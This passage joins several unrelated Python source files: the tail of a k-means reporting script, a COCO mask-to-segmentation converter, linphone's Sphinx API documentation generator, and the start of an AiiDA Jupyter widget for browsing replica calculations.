        f.write(", ")
        f.write(str(centroids_new[i][2]))
        f.write(", ")
        f.write(str(centroids_new[i][3]))
        f.write("\n")
    #Centroids Test (means of the test points assigned to each cluster)
    f.write("Centroids (Test): \n")
    for j in range(len(centroids_new)):
        print("Centroid (Test)" + str(j+1) + " = " + str(test_centroids_coordinate[j][0]) + ", " + str(test_centroids_coordinate[j][1]) + ", " + str(test_centroids_coordinate[j][2]) + ", " + str(test_centroids_coordinate[j][3]))
        f.write("Centroid " + str(j+1) + " = ")
        f.write(str(test_centroids_coordinate[j][0]))
        f.write(", ")
        f.write(str(test_centroids_coordinate[j][1]))
        f.write(", ")
        f.write(str(test_centroids_coordinate[j][2]))
        f.write(", ")
        f.write(str(test_centroids_coordinate[j][3]))
        f.write("\n")
    #Centroids Error
    f.write("Centroid Errors: \n")
    for j in range(len(test_centroids_error)):
        # NOTE(review): the same error value is printed three times here --
        # probably meant to be printed once.
        print("Centroid (Error)" + str(j+1) + " = " + str(test_centroids_error[j]) + ", " + str(test_centroids_error[j]) + ", " + str(test_centroids_error[j]))
        f.write("Centroid " + str(j+1) + " = ")
        f.write(str(test_centroids_error[j]))
        f.write("\n")
    # NOTE(review): accuracy = 1 - mean(per-cluster error), expressed as a
    # percentage; can go negative for large errors -- confirm the formula.
    f.write("Accuracy: {0}%".format(round((1-(np.sum(test_centroids_error)/len(test_centroids_error)))*100, 2))) #centroids_error_overall
    f.write("\n")
    print("Accuracy: {0}%".format((round((1-(np.sum(test_centroids_error)/len(test_centroids_error)))*100, 2)))) #centroids_error_overall
    print("Centroids (Cluster - Points): --Please refer to the save file named kmeans.txt--")
    print("==================================")
    # One "<cluster> - w, x, y, z" line per test point (file only).
    f.write("Centroid (Cluster - Points): \n")
    for i in range(len(test_pointToCluster)):
        f.write(str(test_pointToCluster[i][0]))
        f.write(" - ")
        f.write(str(test_pointToCluster[i][1][0]))
        f.write(", ")
        f.write(str(test_pointToCluster[i][1][1]))
        f.write(", ")
        f.write(str(test_pointToCluster[i][1][2]))
        f.write(", ")
        f.write(str(test_pointToCluster[i][1][3]))
        f.write("\n")
    f.write("=====================================")
    f.close()
def updateCentroids(cw, cx, cy, cz, p):
    """Turn per-cluster coordinate sums into means by dividing by point counts.

    Mutates the four coordinate arrays in place and also returns them.  A zero
    count yields numpy's usual divide-by-zero result for that cluster.
    """
    for idx, count in enumerate(p):
        cw[idx] = cw[idx] / count
        cx[idx] = cx[idx] / count
        cy[idx] = cy[idx] / count
        cz[idx] = cz[idx] / count
    return cw, cx, cy, cz
def L1_norm(p1, p2, axisParam):
    """Manhattan (L1) distance between p1 and p2, reduced along axisParam
    (None reduces over all elements)."""
    diff = np.abs(p1 - p2)
    return np.sum(diff, axis=axisParam)
def L2_norm(p1, p2, axisParam):
    """Euclidean (L2) distance between p1 and p2, reduced along axisParam
    (None reduces over all elements)."""
    squared = (p1 - p2) ** 2
    return np.sqrt(np.sum(squared, axis=axisParam))
def eudistance(p1, p2, axisParam):
    """Euclidean distance via numpy.linalg.norm (equivalent to L2_norm)."""
    delta = p1 - p2
    return np.linalg.norm(delta, axis=axisParam)
def main():
    """Create the Qt application and main window, then run the event loop."""
    app = QApplication(sys.argv)
    mainWindow = MainWindow()  # kept alive by this local for the loop's lifetime
    sys.exit(app.exec_())
if __name__ == '__main__':
    main()
# -*- coding: utf-8 -*-
"""
@author: LiuXin
@contact: <EMAIL>
@Created on: 2020/8/4 下午1:56
"""
from pycocotools.coco import COCO
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import os,shutil,cv2
from dataloader.skmt import SkmtDataSet
def resave_img(img_name, output_path, prefix):
    '''Re-save an image as RGB under ``<output_path>/JPEGImages`` with a
    prefixed file name.

    Args:
        img_name: source image path.
        output_path: dataset root containing a JPEGImages directory.
        prefix: some info to distinguish img (prepended to the file name).
    Returns:
        None
    '''
    # os.path.basename is portable; splitting on '/' breaks on Windows paths.
    base_name = os.path.basename(img_name)
    img = Image.open(img_name)
    if img.mode != 'RGB':
        # Greyscale/paletted inputs are converted so every saved image is RGB.
        img = img.convert('RGB')
    img.save(os.path.join(output_path, 'JPEGImages', prefix + base_name))
def get_mask(coco, anns, file_name, prefix=None):
    '''read img file and construct a (h,w) seg_mask according to the anns
    Args:
        coco(COCO): COCO handle used to rasterise each annotation
        anns(list[dict]): the anns of one img
        file_name: path of the image (only its size is used)
        prefix: unused; kept for interface compatibility
    Returns:
        seg_map(PIL.Image, mode 'P'): per-pixel class-id map
    '''
    img = Image.open(file_name)
    # np.int was removed in NumPy 1.24; the builtin int is the equivalent dtype.
    seg_mask = np.zeros((img.size[1], img.size[0]), dtype=int)
    for ann in anns:
        mask = coco.annToMask(ann)
        # TODO: mask out the classes that are not needed
        # Category ids beyond the known classes are folded into background (0).
        if(ann['category_id']>=SkmtDataSet.NUM_CLASSES):
            ann['category_id']=0
        seg_mask[np.where(mask)]=ann['category_id']
    # return mask
    seg_map = Image.fromarray(seg_mask.astype('uint8')).convert('P')
    return seg_map
def ann_to_segmap(coco,input_root,output_root,prefix):
    '''
    get anns of each img and build a seg_map, and save it to the seg_map_path
    Args:
        coco(COCO): obj of coco
        input_root: dataset root containing an ``images`` directory
        output_root: root containing ``SegmentationClass`` (and ``JPEGImages``
            when prefix is given)
        prefix: the prefix of newname for images, eg: Shoulder11_200812_1.jpg
    Returns:
        None
    '''
    imgIds = coco.getImgIds()
    img_infos = coco.loadImgs(imgIds)
    img_path =os.path.join(input_root,'images')
    seg_map_path=os.path.join(output_root,'SegmentationClass')
    # iterate over every image in the annotation set
    for index,img_info in enumerate(img_infos):
        annIds = coco.getAnnIds(imgIds=img_info['id'], iscrowd=None)
        anns = coco.loadAnns(annIds)
        file_name=os.path.join(img_path,img_info['file_name'])
        seg_map=get_mask(coco,anns,file_name)
        # add the file-name prefix and save the segmentation map
        if prefix:
            resave_img(file_name,output_root,prefix)
            seg_map.save(os.path.join(seg_map_path,prefix+img_info['file_name'].replace('jpg','png')))
    return None
def visualize_map_img(img_path, seg_map_path):
    '''visualize the seg map by rgb picture

    For every mask file in seg_map_path, shows the original JPEG next to a
    palette-coloured rendering of the mask.
    Returns:
        None
    '''
    for map_file in os.listdir(seg_map_path):
        mask = Image.open(os.path.join(seg_map_path, map_file))
        img = Image.open(os.path.join(img_path, map_file.replace('png', 'jpg')))
        label_mask = np.array(mask)
        # One working copy per colour channel, painted class by class.
        channels = [label_mask.copy() for _ in range(3)]
        for class_id in range(0, np.max(label_mask) + 1):
            colour = SkmtDataSet.PALETTE[class_id]
            for c in range(3):
                channels[c][label_mask == class_id] = colour[c]
        rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))
        for c in range(3):
            rgb[:, :, c] = channels[c] / 255.0
        # plot the original image and its coloured mask side by side
        plt.figure(figsize=(200, 100))
        plt.subplot(1, 2, 1)
        plt.imshow(img)
        plt.subplot(1, 2, 2)
        plt.imshow(rgb)
        plt.show()
if __name__ =='__main__':
    # Hard-coded local dataset paths; adjust for other machines.
    img_path='/home/liuxin/Documents/CV/dataset/SKMT/Seg/JPEGImages'
    seg_map_path='/home/liuxin/Documents/CV/dataset/SKMT/Seg/SegmentationClass'
    visualize_map_img(img_path,seg_map_path)
# coreapi/help/doc/sphinx/gendoc.py (from the linphone project)
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2017 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import hashlib
import logging
import os
import pystache
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', '..', '..', 'tools'))
import abstractapi
import genapixml as capi
import metaname
import metadoc
def md5sum(file):
    """Return the hex MD5 digest of the given file's contents."""
    with open(file, mode='rb') as f:
        digest = hashlib.md5(f.read())
    return digest.hexdigest()
class RstTools:
    """Static helpers for emitting reStructuredText: heading builders for the
    different section levels, plus CSV- and grid-table renderers."""

    @staticmethod
    def make_part(text):
        """Part heading: '#' overline and underline."""
        return RstTools.make_section(text, char='#', overline=True)

    @staticmethod
    def make_chapter(text):
        """Chapter heading: '*' overline and underline."""
        return RstTools.make_section(text, char='*', overline=True)

    @staticmethod
    def make_section(text, char='=', overline=False):
        """Underline (and optionally overline) *text* with *char*, sized to
        the text length as RST requires."""
        size = len(text)
        underline = (char*size)
        lines = [text, underline]
        if overline:
            lines.insert(0, underline)
        return '\n'.join(lines)

    @staticmethod
    def make_subsection(text):
        """Subsection heading: '-' underline."""
        return RstTools.make_section(text, char='-')

    @staticmethod
    def make_subsubsection(text):
        """Subsubsection heading: '^' underline."""
        return RstTools.make_section(text, char='^')

    class Table:
        """Base table: an ordered list of rows filled in by subclasses."""
        def __init__(self):
            self._rows = []

        @property
        def rows(self):
            return self._rows

    class CSVTable(Table):
        """Renders rows as a Sphinx '.. csv-table::' directive."""
        def addrow(self, row):
            self._rows.append(', '.join([self._format_cell(cell) for cell in row]))

        def __str__(self):
            return '.. csv-table::\n\t\n\t' + '\n\t'.join(self._rows)

        def _format_cell(self, cell):
            # Quote every cell; embedded double quotes are doubled per CSV rules.
            return '"{0}"'.format(cell.replace('"', '""'))

    class GridTable(Table):
        """Renders rows as an RST grid table drawn with '+', '-' and '|'.

        Column widths and row heights are tracked as rows are added so that
        multi-line cells stay aligned.
        """
        def __init__(self):
            RstTools.Table.__init__(self)
            self._widths = []   # widest cell text seen per column
            self._heights = []  # line count of the tallest cell per row

        def addrow(self, row):
            """Add a row; the first row fixes the column count, later rows
            must match it.  Cells are split on newlines for rendering."""
            if len(self._widths) == 0:
                self._widths.append(0)
                self._widths *= len(row)
            elif len(row) != len(self._widths):
                raise ValueError('row width mismatch table width')
            height = 0
            row2 = []
            i = 0
            while i<len(row):
                lines = str(row[i]).split(sep='\n')
                row2.append(lines)
                width = len(max(lines, key=len))
                self._widths[i] = max(self._widths[i], width)
                height = max(height, len(lines))
                i += 1
            self._rows.append(row2)
            self._heights.append(height)

        def _make_hline(self):
            """Horizontal separator line sized to the current column widths."""
            res = '+'
            for width in self._widths:
                res += ('-' * (width+2))
                res += '+'
            res += '\n'
            return res

        def _make_row(self, idx):
            """Render row *idx*: one output line per line of its tallest cell,
            padding shorter cells with spaces."""
            res = ''
            row = self._rows[idx]
            j = 0
            while j < self._heights[idx]:
                res += '|'
                i = 0
                while i < len(row):
                    line = row[i][j] if j < len(row[i]) else ''
                    res += ' {0} '.format(line)
                    res += (' ' * (self._widths[i]-len(line)))
                    res += '|'
                    i += 1
                res += '\n'
                j += 1
            return res

        def __str__(self):
            if len(self._rows) == 0 or len(self._widths) == 0:
                return ''
            else:
                res = self._make_hline()
                i = 0
                while i<len(self._rows):
                    res += self._make_row(i)
                    res += self._make_hline()
                    i += 1
                return res
class LangInfo:
    """Per-language bundle: the language code, its display name and the
    name/API/doc translators used while generating that language's pages."""

    _displayNames = {
        'C' : 'C',
        'Cpp' : 'C++',
        'Java' : 'Java',
        'CSharp': 'C#'
    }

    def __init__(self, langCode):
        if langCode not in LangInfo._displayNames:
            raise ValueError("Invalid language code '{0}'".format(langCode))
        self.langCode = langCode
        self.nameTranslator = metaname.Translator.get(langCode)
        self.langTranslator = abstractapi.Translator.get(langCode)
        self.docTranslator = metadoc.SphinxTranslator(langCode)

    @property
    def displayName(self):
        """Human-readable language name, e.g. 'Cpp' -> 'C++'."""
        return self._displayNames[self.langCode]

    @property
    def directory(self):
        """Output sub-directory for this language (lower-cased code)."""
        return self.langCode.lower()
class SphinxPart(object):
    """Base for Sphinx template contexts: exposes the language info plus the
    pystache lambda helpers that the .rst templates call to build headings."""

    def __init__(self, lang, langs):
        object.__init__(self)
        self.lang = lang    # LangInfo of the language being rendered
        self.langs = langs  # all languages, used to build selector links

    @property
    def language(self):
        return self.lang.displayName

    @property
    def docTranslator(self):
        return self.lang.docTranslator

    @property
    def hasNamespaceDeclarator(self):
        return ('namespaceDeclarator' in dir(self.docTranslator))

    @property
    def isJava(self):
        return self.lang.langCode == 'Java'

    @property
    def isNotJava(self):
        return not self.isJava

    def make_part(self):
        return lambda text: RstTools.make_part(pystache.render(text, self))

    def make_chapter(self):
        return lambda text: RstTools.make_chapter(pystache.render(text, self))

    def make_section(self):
        return lambda text: RstTools.make_section(pystache.render(text, self))

    def make_subsection(self):
        return lambda text: RstTools.make_subsection(pystache.render(text, self))

    def make_subsubsection(self):
        # BUG FIX: this method was previously also named make_subsection,
        # silently overriding the real make_subsection above and leaving the
        # templates no way to emit a subsubsection heading.
        return lambda text: RstTools.make_subsubsection(pystache.render(text, self))

    def write_declarator(self):
        return lambda text: self.docTranslator.get_declarator(text)

    def _make_selector(self, obj):
        """Build the language-switch line: the current language as plain text,
        every other language as a cross-reference to the same object."""
        links = []
        for lang in self.langs:
            if lang is self.lang:
                link = lang.displayName
            else:
                # Java has no per-enumerator anchors, so link to the parent enum.
                if lang.langCode == 'Java' and type(obj) is abstractapi.Enumerator:
                    ref = metadoc.Reference.make_ref_from_object(None, obj.parent)
                else:
                    ref = metadoc.Reference.make_ref_from_object(None, obj)
                link = ref.translate(lang.docTranslator, label=lang.displayName)
            links.append(link)
        return ' '.join(links)
class EnumPart(SphinxPart):
    """Template context describing one enum: translated names, docs,
    enumerators and cross-language selector links."""

    def __init__(self, enum, lang, langs, namespace=None):
        SphinxPart.__init__(self, lang, langs)
        nameTr = self.lang.nameTranslator
        self.name = enum.name.translate(nameTr)
        self.fullName = enum.name.translate(nameTr, recursive=True)
        self.briefDesc = enum.briefDescription.translate(self.docTranslator)
        self.enumerators = [self._translate_enumerator(item) for item in enum.enumerators]
        self.selector = self._make_selector(enum)
        self.sectionName = RstTools.make_section(self.name)
        # Java renders an actual declaration; other languages show the bare name.
        if self.lang.langCode == 'Java':
            self.declaration = 'public enum {0}'.format(self.name)
        else:
            self.declaration = self.name
        ref = metadoc.ClassReference(None)
        ref.relatedObject = enum
        self.link = ref.translate(lang.docTranslator)

    def _translate_enumerator(self, enumerator):
        """Map one enumerator to the dict consumed by the .rst template."""
        return {
            'name' : enumerator.name.translate(self.lang.nameTranslator),
            'briefDesc' : enumerator.briefDescription.translate(self.docTranslator),
            'value' : enumerator.translate_value(self.lang.langTranslator),
            'selector' : self._make_selector(enumerator)
        }
class SphinxPage(SphinxPart):
    """A SphinxPart that knows how to render itself into an .rst file."""

    def __init__(self, lang, langs, filename):
        SphinxPart.__init__(self, lang, langs)
        self.filename = filename

    def write(self, directory):
        """Render this page into ``directory/filename``.

        The output is first written to a .tmp file; the real file is replaced
        only when the content actually changed (MD5 differs), keeping mtimes
        stable for incremental Sphinx builds.
        """
        renderer = pystache.Renderer()
        filepath = os.path.join(directory, self.filename)
        tmpFilepath = filepath + '.tmp'
        with open(tmpFilepath, mode='w') as out:
            out.write(renderer.render(self))
        unchanged = os.path.exists(filepath) and md5sum(filepath) == md5sum(tmpFilepath)
        if unchanged:
            os.remove(tmpFilepath)
        else:
            os.rename(tmpFilepath, filepath)
        return filepath

    def _get_translated_namespace(self, obj):
        """Translated, fully-qualified name of obj's enclosing namespace."""
        namespace = obj.find_first_ancestor_by_type(abstractapi.Namespace)
        return namespace.name.translate(self.lang.nameTranslator, recursive=True)

    @staticmethod
    def _classname_to_filename(classname):
        """Map a class name to its page file name (snake_case of full name)."""
        return classname.to_snake_case(fullName=True) + '.rst'
class IndexPage(SphinxPage):
    """The per-language index page listing every generated class/enum page."""

    def __init__(self, lang, filename):
        SphinxPage.__init__(self, lang, None, filename)
        self._entries = []   # list of {'filename': ...} dicts
        self._sorted = True  # lazily re-sorted when the entries are read

    @property
    def title(self):
        return RstTools.make_chapter("{0} API".format(self.lang.displayName))

    @property
    def dir(self):
        return self.lang.directory

    @property
    def entries(self):
        """Entries sorted by file name; sorting is deferred until first read
        after a mutation."""
        if not self._sorted:
            self._entries.sort(key=lambda entry: entry['filename'])
            self._sorted = True
        return self._entries

    def add_entry(self, filename):
        self.entries.append({'filename': filename})
        self._sorted = False
class EnumPage(SphinxPage):
    """A page documenting a single enum in a given language."""

    def __init__(self, enum, lang, langs):
        SphinxPage.__init__(self, lang, langs, SphinxPage._classname_to_filename(enum.name))
        namespace = enum.find_first_ancestor_by_type(abstractapi.Namespace)
        # C pages carry no namespace information.
        if lang.langCode == 'C':
            self.namespace = None
        else:
            self.namespace = namespace.name.translate(lang.nameTranslator)
        self.enum = EnumPart(enum, lang, langs, namespace=namespace)
class ClassPage(SphinxPage):
    """A page documenting a single class or interface in a given language."""

    def __init__(self, _class, lang, langs):
        filename = SphinxPage._classname_to_filename(_class.name)
        SphinxPage.__init__(self, lang, langs, filename)
        namespace = _class.find_first_ancestor_by_type(abstractapi.Namespace)
        self.namespace = namespace.name.translate(self.lang.nameTranslator, recursive=True)
        self.className = _class.name.translate(self.lang.nameTranslator)
        self.fullClassName = _class.name.translate(self.lang.nameTranslator, recursive=True)
        self.briefDoc = _class.briefDescription.translate(self.docTranslator)
        self.detailedDoc = _class.detailedDescription.translate(self.docTranslator) if _class.detailedDescription is not None else None
        self.enums = [EnumPart(enum, lang, langs) for enum in _class.enums]
        # Only full Class objects have properties; interfaces don't.
        self.properties = self._translate_properties(_class.properties) if isinstance(_class, abstractapi.Class) else []
        self.methods = self._translate_methods(_class.instanceMethods)
        self.classMethods = self._translate_methods(_class.classMethods)
        self.selector = self._make_selector(_class)

    @property
    def classDeclaration(self):
        """Declaration line shown at the top of the page (Java gets a full one)."""
        return 'public interface {0}'.format(self.className) if self.lang.langCode == 'Java' else self.className

    @property
    def hasMethods(self):
        return len(self.methods) > 0

    @property
    def hasClassMethods(self):
        return len(self.classMethods) > 0

    @property
    def hasProperties(self):
        return len(self.properties) > 0

    @property
    def hasEnums(self):
        return len(self.enums) > 0

    def _translate_properties(self, properties):
        """Translate property accessors into template dicts with ref labels."""
        translatedProperties = []
        for property_ in properties:
            propertyAttr = {
                'name' : property_.name.translate(self.lang.nameTranslator),
                'getter' : self._translate_method(property_.getter) if property_.getter is not None else None,
                'setter' : self._translate_method(property_.setter) if property_.setter is not None else None
            }
            propertyAttr['title'] = RstTools.make_subsubsection(propertyAttr['name'])
            # The cross-reference label is derived from the getter when there
            # is one, otherwise from the setter.
            propertyAttr['ref_label'] = (self.lang.langCode + '_')
            propertyAttr['ref_label'] += (property_.getter.name.to_snake_case(fullName=True) if property_.getter is not None else property_.setter.name.to_snake_case(fullName=True))
            translatedProperties.append(propertyAttr)
        return translatedProperties

    def _translate_methods(self, methods):
        """Translate a list of methods into template dicts."""
        return [self._translate_method(method) for method in methods]

    def _translate_method(self, method):
        """Translate one method: prototype, docs, selector and doc link."""
        namespace = method.find_first_ancestor_by_type(abstractapi.Class, abstractapi.Interface)
        methAttr = {
            'prototype' : method.translate_as_prototype(self.lang.langTranslator, namespace=namespace),
            'briefDoc' : method.briefDescription.translate(self.docTranslator),
            # Bug fix: guard against a missing detailed description, exactly
            # as __init__ already does for the class-level detailedDoc.
            'detailedDoc' : method.detailedDescription.translate(self.docTranslator) if method.detailedDescription is not None else None,
            'selector' : self._make_selector(method)
        }
        reference = metadoc.FunctionReference(None)
        reference.relatedObject = method
        # Reuse the namespace computed above instead of walking ancestors twice.
        methAttr['link'] = reference.translate(self.lang.docTranslator, namespace=namespace)
        return methAttr

    @property
    def enumsSummary(self):
        """CSV summary table of the class' enums (link + brief doc)."""
        table = RstTools.CSVTable()
        for enum in self.enums:
            briefDoc = ' '.join([line['line'] for line in enum.briefDesc['lines']])
            table.addrow((enum.link, briefDoc))
        return table

    @property
    def propertiesSummary(self):
        """CSV summary table of the class' properties (ref + brief doc)."""
        table = RstTools.CSVTable()
        for property_ in self.properties:
            reference = ':ref:`{0}`'.format(property_['ref_label'])
            briefDoc = property_['getter']['briefDoc'] if property_['getter'] is not None else property_['setter']['briefDoc']
            briefDoc = ' '.join([line['line'] for line in briefDoc['lines']])
            table.addrow([reference, briefDoc])
        return table

    @property
    def instanceMethodsSummary(self):
        """CSV summary table of instance methods (link + brief doc)."""
        table = RstTools.CSVTable()
        for method in self.methods:
            briefDoc = ' '.join([line['line'] for line in method['briefDoc']['lines']])
            table.addrow([method['link'], briefDoc])
        return table

    @property
    def classMethodsSummary(self):
        """CSV summary table of class methods (link + brief doc)."""
        table = RstTools.CSVTable()
        for method in self.classMethods:
            briefDoc = ' '.join([line['line'] for line in method['briefDoc']['lines']])
            table.addrow([method['link'], briefDoc])
        return table
class OldFilesCleaner:
    """Deletes every file under a root directory except explicitly protected ones.

    Directories themselves are never removed, only files.
    """

    def __init__(self, rootDirectory):
        self.root = rootDirectory
        self._filesToKeep = set()

    def protect_file(self, directory):
        """Mark a path as protected so clean() will not delete it."""
        self._filesToKeep.add(directory)

    def clean(self):
        """Recursively delete all unprotected files under the root."""
        self._clean(self.root)

    def _clean(self, dir_):
        # Depth-first walk: recurse into directories, remove unprotected files.
        if not os.path.isdir(dir_):
            if dir_ not in self._filesToKeep:
                os.remove(dir_)
            return
        for child in os.listdir(dir_):
            self._clean(os.path.join(dir_, child))
class DocGenerator:
    """Generates the Sphinx documentation tree, one directory per language."""

    def __init__(self, api):
        self.api = api
        self.languages = [
            LangInfo('C'),
            LangInfo('Cpp'),
            LangInfo('Java'),
            LangInfo('CSharp')
        ]

    def generate(self, outputdir):
        """Write enum/class pages and an index for every language under *outputdir*.

        Previously generated files that no longer correspond to an API
        element are removed afterwards.
        """
        for lang in self.languages:
            # Bug fix: use the `outputdir` parameter instead of the global
            # `args`, so generate() also works when called programmatically
            # (not only from the __main__ script).
            directory = os.path.join(outputdir, lang.directory)
            cleaner = OldFilesCleaner(directory)
            indexPage = IndexPage(lang, 'index.rst')
            # makedirs also creates any missing parent directories.
            os.makedirs(directory, exist_ok=True)
            for enum in self.api.namespace.enums:
                page = EnumPage(enum, lang, self.languages)
                filepath = page.write(directory)
                indexPage.add_entry(page.filename)
                cleaner.protect_file(filepath)
            for class_ in (self.api.namespace.classes + self.api.namespace.interfaces):
                page = ClassPage(class_, lang, self.languages)
                filepath = page.write(directory)
                indexPage.add_entry(page.filename)
                cleaner.protect_file(filepath)
            filepath = indexPage.write(directory)
            cleaner.protect_file(filepath)
            cleaner.clean()
if __name__ == '__main__':
    argparser = argparse.ArgumentParser(description='Generate a sphinx project to generate the documentation of Linphone Core API.')
    argparser.add_argument('xmldir', type=str, help='directory holding the XML documentation of the C API generated by Doxygen')
    # Bug fix: each option string must be passed as a separate argument.
    # '-o --output' as one string registers a single literal option name that
    # can never be matched on the command line.
    argparser.add_argument('-o', '--output', type=str, help='directory into where Sphinx source files will be written', dest='outputdir', default='.')
    argparser.add_argument('-v', '--verbose', action='store_true', default=False, dest='verbose_mode', help='Show warning and info messages')
    args = argparser.parse_args()

    loglevel = logging.INFO if args.verbose_mode else logging.ERROR
    logging.basicConfig(format='%(levelname)s[%(name)s]: %(message)s', level=loglevel)

    # Parse the Doxygen XML into the abstract API model, then generate.
    cProject = capi.Project()
    cProject.initFromDir(args.xmldir)
    cProject.check()

    absApiParser = abstractapi.CParser(cProject)
    absApiParser.parse_all()
    docGenerator = DocGenerator(absApiParser)
    docGenerator.generate(args.outputdir)
# ---------------------------------------------------------------------------
import ipywidgets as ipw
from IPython.display import display, clear_output, HTML
import nglview
import time
import ase.io
import ase.units as aseu
from ase.data.colors import jmol_colors
import urllib.parse
import numpy as np
import copy
import re
from collections import OrderedDict
import matplotlib.pyplot as plt
from pprint import pprint
from tempfile import NamedTemporaryFile
from base64 import b64encode
from aiida.orm.querybuilder import QueryBuilder
from aiida.orm import StructureData, Dict, WorkChainNode
from aiida.orm import load_node
from aiida.plugins import WorkflowFactory, CalculationFactory
from .collective_variables import COLVARS
# Shared ipywidgets styling used by the widgets below (dropdown, checkboxes,
# progress bar): wide description labels and 70%-width controls.
style = {'description_width': '120px'}
layout = {'width': '70%'}
class SearchReplicaWidget(ipw.VBox):
    """Widget to browse ReplicaWorkChain calculations.

    Newly finished replica work chains can be "preprocessed": the actual
    collective-variable (CV) value, distance to the previous replica and a
    thumbnail image are computed per structure and cached as node extras.
    A preprocessed replica set can then be selected and visualized: an
    energy/CV plot, per-replica thumbnails and a selectable list of
    structure PKs.
    """

    def __init__(self, **kwargs):
        # Bump this version to force re-preprocessing of all replica sets.
        self.preprocess_version = 0.16

        btn_style = {'description_width': '60px'}
        btn_layout = {'width': '20%'}

        self.check_new_btn = ipw.Button(description="Check new calculations", style=btn_style, layout=btn_layout)
        self.out_preproc = ipw.Output()
        self.check_new_btn.on_click(lambda x: self.preprocess_replicas())

        self.replica_calcs = None

        self.drop_replica = ipw.Dropdown(options=[], description='Calculation:',
                                         style=style, layout=layout)
        self.parse_preprocessed_replica_calcs()

        self.btn_show = ipw.Button(description="Show", style=btn_style, layout=btn_layout)
        self.output_header = ipw.Output()
        self.output_plot = ipw.Output()
        self.output_thumbnails = ipw.Output()
        self.output_checked_pks = ipw.Output()

        self.btn_show.on_click(self.on_show_btn_click)

        ### ---------------------------------------------------------
        ### Define the ipw structure and create parent VBOX
        children = [
            self.check_new_btn,
            self.out_preproc,
            self.drop_replica,
            self.btn_show,
            self.output_header,
            self.output_plot,
            self.output_thumbnails,
            self.output_checked_pks
        ]
        super(SearchReplicaWidget, self).__init__(children=children, **kwargs)
        ### ---------------------------------------------------------

    def parse_preprocessed_replica_calcs(self):
        """Load all preprocessed replica sets and populate the dropdown.

        Dropdown labels are '<date of first wc> <set name>', newest first.
        """
        self.replica_calcs = self.parse_rep_wcs(self.get_replica_wcs(True))

        options = OrderedDict(sorted([
            (str(self.replica_calcs[key]['wcs'][0].ctime.date()) + " " + key, key) for key in self.replica_calcs.keys()
        ], reverse=True))
        self.drop_replica.options = options

    def on_show_btn_click(self, btn):
        """Render header, energy/CV plot, thumbnails and PK list for the
        replica set currently selected in the dropdown."""
        selected_replica_calc = self.replica_calcs[self.drop_replica.value]
        self.order_replicas_by_cv_actual(selected_replica_calc)

        html_list, check_list = self.generate_thumbnail_html(selected_replica_calc)

        with self.output_header:
            clear_output()
            html = '<h2>{}</h2><br/> PK: '.format(self.drop_replica.value) + str([wc.pk for wc in selected_replica_calc['wcs']])
            display(ipw.HTML(html))

        with self.output_plot:
            clear_output()
            self.generate_energy_cv_plot(selected_replica_calc)

        n_col = 4
        layout = {'width': '%.1f%%' % (100.0/n_col)}
        with self.output_thumbnails:
            clear_output()
            # Lay the thumbnails out in rows of n_col.
            cur_row = []
            for i, (html, cb) in enumerate(zip(html_list, check_list)):
                cur_row.append(ipw.VBox([ipw.HTML(html), cb], layout=layout))
                if (i+1) % n_col == 0:
                    display(ipw.HBox(cur_row))
                    cur_row = []
            if len(cur_row) != 0:
                display(ipw.HBox(cur_row))

        self.print_checked_pk_list(selected_replica_calc, check_list)

    def print_checked_pk_list(self, replica_calc, check_list):
        """Print the PKs of all replicas whose checkbox is ticked."""
        list_of_pks = [rep[2] for rep in replica_calc['replicas']]
        with self.output_checked_pks:
            clear_output()
            print("List of all replica PKs:")
            rep_pk_str = "["
            for pk, cb in zip(list_of_pks, check_list):
                if cb.value:
                    rep_pk_str += "%d " % pk
            print(rep_pk_str[:-1] + "]")

    def generate_energy_cv_plot(self, replica_calc):
        """Plot SCF and FORCE_EVAL energies (in eV, relative to the initial
        geometry) against the actual collective-variable values."""
        plot_energy_scf = []
        plot_energy_frc = []
        plot_colvar = []
        wc_pk_str = str(replica_calc['wcs'][0].pk)

        ref_en_scf = None
        ref_en_frc = None

        for i, rep in enumerate(replica_calc['replicas']):
            cv_target, energy, struct_pk = rep
            struct_node = load_node(struct_pk)
            colvar_actual = struct_node.get_extra('replica_calcs')[wc_pk_str]['colvar_actual']
            plot_energy_scf.append(energy[0])
            plot_energy_frc.append(energy[1])
            plot_colvar.append(colvar_actual)
            # The replica without a CV target is the initial geometry; use
            # its energies as the zero reference.
            if cv_target is None:
                if ref_en_scf is None:
                    ref_en_scf = energy[0]*27.2114
                    ref_en_frc = energy[1]*27.2114

        # 27.2114: Hartree -> eV conversion factor.
        plot_energy_scf = np.array(plot_energy_scf)*27.2114
        plot_energy_frc = np.array(plot_energy_frc)*27.2114
        # Guard against a set that has no initial (target-less) replica;
        # in that case the energies are simply plotted un-shifted.
        if ref_en_scf is not None:
            plot_energy_scf -= ref_en_scf
            plot_energy_frc -= ref_en_frc

        plt.figure(figsize=(10, 5))
        plt.ylabel('Energy/eV')
        plt.xlabel('Collective variable')
        plt.plot(plot_colvar, plot_energy_scf, 'go-', label='SCF energy')
        plt.plot(plot_colvar, plot_energy_frc, 'bo-', label='FORCE_EVAL energy')
        for i, rep in enumerate(replica_calc['replicas']):
            # if the replica has no cv_target and has energy, it's an initial one, paint as red
            cv_target, energy, struct_pk = rep
            if cv_target is None and energy is not None:
                plt.plot(plot_colvar[i], plot_energy_scf[i], 'ro-')
        plt.legend()
        plt.grid()
        plt.show()

    def generate_thumbnail_html(self, replica_calc):
        """Build per-replica thumbnail HTML snippets plus 'select' checkboxes.

        Returns (html_list, check_list), one entry per replica, in the
        current order of replica_calc['replicas'].
        """
        html_list = []
        check_list = []  # check boxes to show in final pk list

        wc_pk_str = str(replica_calc['wcs'][0].pk)

        for i, rep in enumerate(replica_calc['replicas']):
            cv_target, energy, struct_pk = rep
            struct_node = load_node(struct_pk)

            struct_rep_info = struct_node.get_extra('replica_calcs')[wc_pk_str]
